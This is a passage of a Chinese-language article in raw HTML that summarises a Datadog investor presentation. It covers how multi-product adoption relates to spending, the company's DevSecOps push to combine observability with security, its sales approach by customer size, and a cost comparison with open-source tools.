spend with us and how many products.&#34; </span><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:black;mso-font-kerning:0pt;">（“我们发现，他们与我们的交易额与使用的产品数量之间存在非常强的相关性。”）<span lang="EN-US"><o:p></o:p></span></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100000740" data-ratio="0.5209397344228804" data-s="300,640" data-type="png" data-w="979" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=db7421fc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzwRspYThAL7Gja0xzkiaUUDenodBlxCXwCJKqmW6SXKoStXYTxa3YrC2v9u8aLqwiakniamEf4Gf4gg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">公司正在通过扩大平台功能以及增加使用该平台的人群来推动业务增长。他们强调了随着产品线的拓展，客户对多产品的采用率也在提升，这不仅包括现有的一两个产品，甚至扩展到了八个产品。同时，演讲者指出，虽然有部分客户已经广泛使用了他们的产品，但还有大量客户尚未完全利用平台的所有功能，这意味着还有很大的市场潜力可以挖掘。此外，客户对平台三个核心支柱的全面采用与其消费额之间存在强烈的正相关性。<span lang="EN-US"><o:p></o:p></span></span></p><p><strong><span style="font-size:16.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:#1E4E79;mso-font-kerning:18.0pt;">主题</span></strong><strong><span lang="EN-US" style="font-size:16.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
宋体;color:#1E4E79;mso-font-kerning:18.0pt;">3</span></strong><strong><span style="font-size:16.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:#1E4E79;mso-font-kerning:18.0pt;">：融合可观测性和安全</span></strong><strong><span lang="EN-US" style="font-size:16.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
宋体;color:#1E4E79;mso-font-kerning:18.0pt;"><o:p></o:p></span></strong></p><p><strong><span lang="EN-US" style="font-size:14.0pt;font-family:
&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;color:#276296;mso-font-kerning:
0pt;">3.1 </span></strong><strong><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:Calibri;color:#276296;mso-font-kerning:0pt;">背景：</span></strong><strong><span style="font-size:14.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:#276296;mso-font-kerning:0pt;">割裂的开发、运营和安全</span></strong><strong><span lang="EN-US" style="font-size:14.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
宋体;color:#276296;mso-font-kerning:0pt;"><o:p></o:p></span></strong></p><p><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">&#34;</span><span style="font-size:
12.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:Calibri;color:black;mso-font-kerning:0pt;">为了保护云原生应用，你需要一个统一的平台，成为将应用、基础设施、日志和所有这些组件整合在一起的单一窗口。你需要使开发人员、运营人员和安全团队能够协作，实现<span lang="EN-US">DevSecOps</span>模型。<span lang="EN-US">&#34;<o:p></o:p></span></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100000741" data-ratio="0.5622529644268774" data-s="300,640" data-type="png" data-w="1012" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=1b8314fc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzwRspYThAL7Gja0xzkiaUUDpPcGsDTTV4XguXksX3nU6bjmVwn5k57C7EgFhDtzCrjEmPJZHWibLqQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><span style="font-size:12.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">在现实中，<span lang="EN-US">dev/ops/sec</span>团队被称为<span lang="EN-US">silos</span>是因为它们通常独立运作，使用各自的专门工具和数据源，缺乏有效的信息共享和协作机制。这种隔离导致了信息不对称，影响了团队间的协作效率，使得统一处理安全问题变得困难。<span lang="EN-US"><o:p></o:p></span></span></p><p><span style="font-size:12.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">云原生应用的安全需要解决两个主要问题：应用本身的复杂性和人员协作的挑战。云原生应用由应用代码和基础设施代码组成，生成日志和指标，并由多个微服务构成。安全这些应用意味着在高性能通信和识别恶意活动之间找到平衡。人员方面，开发人员频繁部署代码，运营团队需要实时解决问题，而安全团队则需要与其他团队协作。要解决这些挑战，需要一个统一的平台，将所有组件整合在一起，并促进开发、运营和安全团队之间的协作，实现<span lang="EN-US">DevSecOps</span>模型。<span lang="EN-US"><o:p></o:p></span></span></p><p><strong><span lang="EN-US" style="font-size:14.0pt;font-family:
&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;color:#276296;mso-font-kerning:
0pt;">3.2 </span></strong><strong><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:Calibri;color:#276296;mso-font-kerning:0pt;">用</span></strong><strong><span style="font-size:14.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:#276296;mso-font-kerning:0pt;">可观测性的筷子，夹住了安全的菜</span></strong><strong><span lang="EN-US" style="font-size:14.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
宋体;color:#276296;mso-font-kerning:0pt;"><o:p></o:p></span></strong></p><p><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">“安全责任从不再只是小团队的事情，而是全员的责任。”<span lang="EN-US"><o:p></o:p></span></span></p><p><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:black;mso-font-kerning:0pt;">&#34;We&#39;re just
putting everything, I would say, a click away from the customer.&#34;<o:p></o:p></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100000742" data-ratio="0.54419595314164" data-s="300,640" data-type="png" data-w="939" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=36098174&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzwRspYThAL7Gja0xzkiaUUDaXr0Djm8JlmzDcdzXyibsAUgGs7aXdWQiceMJc5LRslrEr84sIaAJ29A%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100000743" data-ratio="0.5391211146838156" data-s="300,640" data-type="png" data-w="933" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=64015779&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzwRspYThAL7Gja0xzkiaUUDZqGmOKtkibkQ7rQWfickGytQUdxCgAUzkrGr0G8aWY9hNeMbicVGBLnfQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">新推出的<span lang="EN-US">DevSecOps</span>解决方案，这些解决方案将基础设施监控与云安全管理、应用性能监控（<span lang="EN-US">APM</span>）与应用安全管理相结合，帮助客户更好地满足日益增长的安全需求。最后，他强调，通过统一平台，安全责任将从小团队扩展到全体团队成员，并显著简化了内部交易流程。<span lang="EN-US"><o:p></o:p></span></span></p><p><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">这些产品可以通过<span lang="EN-US">Datadog</span>平台轻松启用，只需几次点击即可从最佳的可观测性产品中启用安全功能。这使得客户可以轻松地从开发和运维（<span lang="EN-US">DevOps</span>）过渡到开发、安全和运维（<span lang="EN-US">DevSecOps</span>）<span lang="EN-US"><o:p></o:p></span></span></p><p><strong><span lang="EN-US" style="font-size:14.0pt;font-family:
&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;color:#2E75B5;mso-font-kerning:
0pt;">3.3 </span></strong><strong><span style="font-size:14.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:#2E75B5;mso-font-kerning:0pt;">为什么能夹安全的菜？</span></strong><strong><span lang="EN-US" style="font-size:14.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
宋体;color:#2E75B5;mso-font-kerning:0pt;"><o:p></o:p></span></strong></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100000744" data-ratio="0.5346534653465347" data-s="300,640" data-type="png" data-w="1010" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=e66ee0ff&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzwRspYThAL7Gja0xzkiaUUDNhXczslic0Stu5ubcDrh9UW0eOiaaEXuWAM2FwicvkCicicibJe9iasGym7jg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">云原生应用的安全性可以通过将<span lang="EN-US">DevOps</span>与安全团队整合在同一平台上来实现，从而消除团队之间的孤立。除了提供端到端的安全产品之外，公司还通过服务管理闭环来进一步提升安全性。<span lang="EN-US"><o:p></o:p></span></span></p><p><strong><span lang="EN-US" style="font-size:14.0pt;font-family:
&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;color:#276296;mso-font-kerning:
0pt;">3.4 </span></strong><strong><span style="font-size:14.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:#276296;mso-font-kerning:0pt;">为什么敢夹安全的菜</span></strong><strong><span lang="EN-US" style="font-size:14.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
宋体;color:#276296;mso-font-kerning:0pt;"><o:p></o:p></span></strong></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100000745" data-ratio="0.5412647374062165" data-s="300,640" data-type="png" data-w="933" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=feebb3c9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzwRspYThAL7Gja0xzkiaUUD0V3pc9vDcGzM734e2nVsonCYr8uXJWEtCtCL35wMgJBnSLIteZHTZw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><span style="font-size:12.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">通过平台化的安全产品，<span lang="EN-US">Datadog</span>能够实现大规模的无摩擦用户采纳，并提供</span><span style="font-size:12.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:red;mso-font-kerning:0pt;">深度的上下文信息</span><span style="font-size:
12.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:Calibri;color:black;mso-font-kerning:0pt;">、高效的操作性能和低成本优势。最终，这些产品帮助用户将安全检测转化为实际成果，从而避免传统安全产品高成本且无效的现象。</span><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
Calibri;mso-font-kerning:0pt;"><o:p></o:p></span></p><p><strong><span style="font-size:16.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:Calibri;color:#14324D;mso-font-kerning:18.0pt;">主题</span></strong><strong><span lang="EN-US" style="font-size:16.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
宋体;color:#14324D;mso-font-kerning:18.0pt;">4 </span></strong><strong><span style="font-size:16.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:#14324D;mso-font-kerning:18.0pt;">差异化的</span></strong><strong><span style="font-size:16.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:#14324D;mso-font-kerning:18.0pt;">市场策略</span></strong><strong><span lang="EN-US" style="font-size:16.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
宋体;color:#14324D;mso-font-kerning:18.0pt;"><o:p></o:p></span></strong></p><p><strong><span lang="EN-US" style="font-size:14.0pt;font-family:
&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;color:#276296;mso-font-kerning:
0pt;">4.1 </span></strong><strong><span style="font-size:14.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:#276296;mso-font-kerning:0pt;">狗大户不用参会！</span></strong><strong><span lang="EN-US" style="font-size:14.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
宋体;color:#276296;mso-font-kerning:0pt;"><o:p></o:p></span></strong></p><p><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;background:fuchsia;mso-highlight:fuchsia;mso-font-kerning:
0pt;">【思】大客户驻场主动服务，中型客户开会集中服务，菜鸟客户就是药炉炼丹用</span><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:black;mso-font-kerning:0pt;">。<span lang="EN-US"><o:p></o:p></span></span></p><p><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">“<span lang="EN-US">If we don&#39;t make
our platform easy use with strong documentation, this group will quickly let us
know.</span>” 【重视菜鸟用户】<span lang="EN-US"><o:p></o:p></span></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100000746" data-ratio="0.5280561122244489" data-s="300,640" data-type="png" data-w="998" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=64fe3005&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzwRspYThAL7Gja0xzkiaUUDPsk0qiaWjz2iaXosUC60LKTJV6TA375Afgg6sFrmnCYHmxCzoiaKUKBPw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">大型企业：</span><span style="color: black;font-family: &#34;微软雅黑 Light&#34;, sans-serif;font-size: 12pt;letter-spacing: 0.034em;">数据狗公司根据客户规模划分了不同的销售策略。</span><span style="color: black;font-family: &#34;微软雅黑 Light&#34;, sans-serif;font-size: 12pt;letter-spacing: 0.034em;">对于</span><span lang="EN-US" style="color: black;font-family: &#34;微软雅黑 Light&#34;, sans-serif;font-size: 12pt;letter-spacing: 0.034em;">5000</span><span style="color: black;font-family: &#34;微软雅黑 Light&#34;, sans-serif;font-size: 12pt;letter-spacing: 0.034em;">名员工以上的大型企业客户，公司采用专门的企业销售团队服务，岗位齐全。</span></p><p><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">中型企业：</span><span style="color: black;font-family: &#34;微软雅黑 Light&#34;, sans-serif;font-size: 12pt;letter-spacing: 0.034em;">商业销售团队专注于识别具备云迁移潜力和技术能力的客户，通过社区活动、网络研讨会等营销活动获取潜在客户。</span><span style="color: black;font-family: &#34;微软雅黑 Light&#34;, sans-serif;font-size: 12pt;letter-spacing: 0.034em;">新客户由商业销售团队获取后，几个月后转交给客户成功团队维护，商业销售团队继续寻找新客户。</span><span style="color: black;font-family: &#34;微软雅黑 Light&#34;, sans-serif;font-size: 12pt;letter-spacing: 0.034em;">。</span></p><p><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">菜鸟客户：</span><span lang="EN-US" style="letter-spacing: 0.034em;font-size: 12pt;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">Datadog </span><span style="letter-spacing: 0.034em;font-size: 12pt;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">软件公司不仅关注大型企业客户，还积极拓展包括小型初创公司、学生和工程师在内的广泛用户群体。公司提供自助服务和免费试用，让用户无需销售人员介入即可开始使用。这些用户虽然初期消费不高，但对公司至关重要，因为他们中的一部分未来可能成长为大客户，或者在其他公司担任重要角色时继续使用<span lang="EN-US"> Datadog</span>。此外，服务小型公司也促使<span lang="EN-US"> Datadog </span>保持平台的易用性和文档的完善性。</span></p><p><strong><span lang="EN-US" style="font-size:14.0pt;font-family:
&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;color:#276296;mso-font-kerning:
0pt;">4.2 </span></strong><strong><span style="font-size:14.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:#276296;mso-font-kerning:0pt;">您别自我陶醉，我让会计来算算成本！</span></strong><strong><span lang="EN-US" style="font-size:14.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
宋体;color:#276296;mso-font-kerning:0pt;"><o:p></o:p></span></strong></p><p><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">“关键收获是，他们希望让工程师把时间花在核心业务上，而不是可观测性上。”<span lang="EN-US"><o:p></o:p></span></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100000747" data-ratio="0.5697036223929748" data-s="300,640" data-type="png" data-w="911" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=049191c3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzwRspYThAL7Gja0xzkiaUUDURbcRu1p6KEsd0CGEvnjqTicl5uVG97iaRhm5cyNPyQBI45rREKZpj5A%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">“总拥有成本”视角下，如何衡量开源与商用解决方案的价值。一家医疗公司曾使用多种开源技术和商用解决方案，最初认为开源免费且成本较低，但经过商业价值评估，发现开源的管理成本和工程团队时间消耗巨大。尽管<span lang="EN-US">Datadog</span>的方案在初始报价上看似更昂贵，但从长期来看，总拥有成本仅为他们之前的三分之一，实际性价比更高。“<span lang="EN-US"><o:p></o:p></span></span></p><p><strong><span lang="EN-US" style="font-size:14.0pt;font-family:
&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;color:#276296;mso-font-kerning:
0pt;">4.3 </span></strong><strong><span style="font-size:14.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:#276296;mso-font-kerning:0pt;">满手好牌，赚个盆满钵满</span></strong><strong><span lang="EN-US" style="font-size:14.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
宋体;color:#276296;mso-font-kerning:0pt;">……<o:p></o:p></span></strong></p><p><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">“我们致力于解决客户的问题，很多产品决策都来自于与客户的互动，帮助他们解决更广泛的问题。”<span lang="EN-US"><o:p></o:p></span></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100000748" data-ratio="0.5628476084538376" data-s="300,640" data-type="png" data-w="899" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=557e1032&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzwRspYThAL7Gja0xzkiaUUDuZtIQj0rBjXAaoCUaJTpzWuacLMQcehGwVbKZRvMZ8a1skMhrAva4Q%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><table cellspacing="0" cellpadding="0"><tbody><tr style="mso-yfti-irow:0;mso-yfti-firstrow:yes;"><td width="124" valign="top" style="border-width: 1pt;border-style: solid;border-color: rgb(163, 163, 163);padding: 2pt 3pt;word-break: break-all;"><p style="text-align:left;mso-pagination:widow-orphan;"><strong><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:black;mso-font-kerning:0pt;">领域</span></strong><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:black;mso-font-kerning:0pt;"><o:p></o:p></span></p></td><td width="421" valign="top" style="border-top: 1pt solid rgb(163, 163, 163);border-right: 1pt solid rgb(163, 163, 163);border-bottom: 1pt solid rgb(163, 163, 163);border-left: none;padding: 2pt 3pt;"><p style="text-align:left;mso-pagination:widow-orphan;"><strong><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:black;mso-font-kerning:0pt;">核心观点</span></strong><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:black;mso-font-kerning:0pt;"><o:p></o:p></span></p></td></tr><tr style="mso-yfti-irow:1;"><td width="124" valign="top" style="border-right: 1pt solid rgb(163, 163, 163);border-bottom: 1pt solid rgb(163, 163, 163);border-left: 1pt solid rgb(163, 163, 163);border-top: none;padding: 2pt 3pt;"><p style="text-align:left;mso-pagination:widow-orphan;"><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:black;mso-font-kerning:0pt;">长期发展机会<span lang="EN-US"><o:p></o:p></span></span></p></td><td width="421" valign="top" style="border-top: none;border-left: none;border-bottom: 1pt solid rgb(163, 163, 163);border-right: 1pt solid rgb(163, 163, 163);padding: 2pt 3pt;"><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;">Datadog</span><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:black;mso-font-kerning:0pt;">拥有巨大的长期增长机会，未来前景广阔。<span lang="EN-US"><o:p></o:p></span></span></p></td></tr><tr style="mso-yfti-irow:2;"><td width="124" valign="top" style="border-right: 1pt solid rgb(163, 163, 163);border-bottom: 1pt solid rgb(163, 163, 163);border-left: 1pt solid rgb(163, 163, 163);border-top: none;padding: 2pt 3pt;"><p style="text-align:left;mso-pagination:widow-orphan;"><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:black;mso-font-kerning:0pt;">研发与产品投入<span lang="EN-US"><o:p></o:p></span></span></p></td><td width="421" valign="top" style="border-top: none;border-left: none;border-bottom: 1pt solid rgb(163, 163, 163);border-right: 1pt solid rgb(163, 163, 163);padding: 2pt 3pt;"><p style="text-align:left;mso-pagination:widow-orphan;"><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:black;mso-font-kerning:0pt;">大规模且聪明地投资研发，扩展平台功能，解决更多的使用场景。<span lang="EN-US"><o:p></o:p></span></span></p></td></tr><tr style="mso-yfti-irow:3;"><td width="124" valign="top" style="border-right: 1pt solid rgb(163, 163, 163);border-bottom: 1pt solid rgb(163, 163, 163);border-left: 1pt solid rgb(163, 163, 163);border-top: none;padding: 2pt 3pt;"><p style="text-align:left;mso-pagination:widow-orphan;"><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:black;mso-font-kerning:0pt;">客户问题解决<span lang="EN-US"><o:p></o:p></span></span></p></td><td width="421" valign="top" style="border-top: none;border-left: none;border-bottom: 1pt solid rgb(163, 163, 163);border-right: 1pt solid rgb(163, 163, 163);padding: 2pt 3pt;"><p style="text-align:left;mso-pagination:widow-orphan;"><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:black;mso-font-kerning:0pt;">极度专注于通过</span><span style="font-size:
  12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:red;mso-font-kerning:0pt;">与客户互动解决其痛点</span><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;color:black;mso-font-kerning:0pt;">，推动产品创新和平台增长。</span><span lang="EN-US" style="font-size:
  12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;mso-font-kerning:0pt;"><o:p></o:p></span></p></td></tr><tr style="mso-yfti-irow:4;"><td width="124" valign="top" style="border-right: 1pt solid rgb(163, 163, 163);border-bottom: 1pt solid rgb(163, 163, 163);border-left: 1pt solid rgb(163, 163, 163);border-top: none;padding: 2pt 3pt;"><p style="text-align:left;mso-pagination:widow-orphan;"><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:black;mso-font-kerning:0pt;">市场策略<span lang="EN-US"><o:p></o:p></span></span></p></td><td width="421" valign="top" style="border-top: none;border-left: none;border-bottom: 1pt solid rgb(163, 163, 163);border-right: 1pt solid rgb(163, 163, 163);padding: 2pt 3pt;"><p style="text-align:left;mso-pagination:widow-orphan;"><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:black;mso-font-kerning:0pt;">采用“落地并扩展”策略，客户从单一功能开始，逐步扩大到更多产品使用。<span lang="EN-US"><o:p></o:p></span></span></p></td></tr><tr style="mso-yfti-irow:5;"><td width="124" valign="top" style="border-right: 1pt solid rgb(163, 163, 163);border-bottom: 1pt solid rgb(163, 163, 163);border-left: 1pt solid rgb(163, 163, 163);border-top: none;padding: 2pt 3pt;"><p style="text-align:left;mso-pagination:widow-orphan;"><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:black;mso-font-kerning:0pt;">平台创新<span lang="EN-US"><o:p></o:p></span></span></p></td><td width="421" valign="top" style="border-top: none;border-left: none;border-bottom: 1pt solid rgb(163, 163, 163);border-right: 1pt solid rgb(163, 163, 163);padding: 2pt 3pt;"><p style="text-align:left;mso-pagination:widow-orphan;"><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:black;mso-font-kerning:0pt;">到客户现场（</span><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:red;mso-font-kerning:0pt;">meeting cusutomers where they are</span><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:black;mso-font-kerning:0pt;">），通过客户反馈和问题解决，推动平台功能的重大创新与扩展。</span><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:宋体;mso-font-kerning:0pt;"><o:p></o:p></span></p></td></tr><tr style="mso-yfti-irow:6;"><td width="124" valign="top" style="border-right: 1pt solid rgb(163, 163, 163);border-bottom: 1pt solid rgb(163, 163, 163);border-left: 1pt solid rgb(163, 163, 163);border-top: none;padding: 2pt 3pt;"><p style="text-align:left;mso-pagination:widow-orphan;"><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:black;mso-font-kerning:0pt;">增长模式<span lang="EN-US"><o:p></o:p></span></span></p></td><td width="421" valign="top" style="border-top: none;border-left: none;border-bottom: 1pt solid rgb(163, 163, 163);border-right: 1pt solid rgb(163, 163, 163);padding: 2pt 3pt;"><p style="text-align:left;mso-pagination:widow-orphan;"><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:black;mso-font-kerning:0pt;">产品创新与客户需求相结合，持续推动平台的增长。<span lang="EN-US"><o:p></o:p></span></span></p></td></tr><tr style="mso-yfti-irow:7;mso-yfti-lastrow:yes;"><td width="124" valign="top" style="border-right: 1pt solid rgb(163, 163, 163);border-bottom: 1pt solid rgb(163, 163, 163);border-left: 1pt solid rgb(163, 163, 163);border-top: none;padding: 2pt 3pt;"><p style="text-align:left;mso-pagination:widow-orphan;"><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
